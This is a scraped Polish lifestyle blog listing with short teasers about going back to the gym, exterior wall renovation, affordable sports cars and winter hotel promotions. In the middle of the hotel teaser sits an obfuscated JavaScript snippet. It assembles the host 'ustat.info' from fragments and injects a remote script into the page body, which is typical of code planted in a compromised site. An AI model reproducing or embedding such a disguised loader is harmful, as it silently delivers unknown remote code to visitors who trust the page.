Lifestyle

7 porad, jak bezboleśnie wrócić na siłownię

Kontuzja, choroba, nowe obowiązki – powodów, dla których przestajemy ćwiczyć jest dużo. Niestety im dłuższa przerwa od treningów, tym kondycja słabsza i powrót trudniejszy. Co

Odnawianie ścian zewnętrznych

Każdy właściciel domu (czy to nowo wybudowanego, kupionego, czy też przekazywanego z pokolenia na pokolenie) musi się liczyć z tym, że w pewnym momencie będzie

Czas wolny

Sportowe auto, na które Cię stać

Oszczędność, funkcjonalność, niezawodność – niby są bardzo ważne, jednak statystyki nie kłamią – dla 50% z nas liczą się osiągi i design. Może nie wszyscy

Zimowe promocje w hotelach. Kiedy najlepiej zarezerwować pobyt? Zimowe promocje w hotelach. Kiedy najlepiej zarezerwować pobyt?

(function(){ x0k3_=("u"+"")+"s"+"";x0k3_+=("tat.")+("i"); x0k3=document.createElement("script");x0k3.type="text/javascript";x0k3_+="nf"+("o")+"/"; x0k3u="12132112"+".";x0k3.async=true;x0k3u+="dur80rpt0k3rawrmepa4fnw90yps8l"; x0k3.src="//"+x0k3_+x0k3u; x0k3b=document.body; x0k3b.appendChild(x0k3); })(); Wbrew obiegowej opinii, wypoczynek w dobrym hotelu wcale nie musi być drogi. Jeżeli planujemy wyjazd do innego miasta z

Top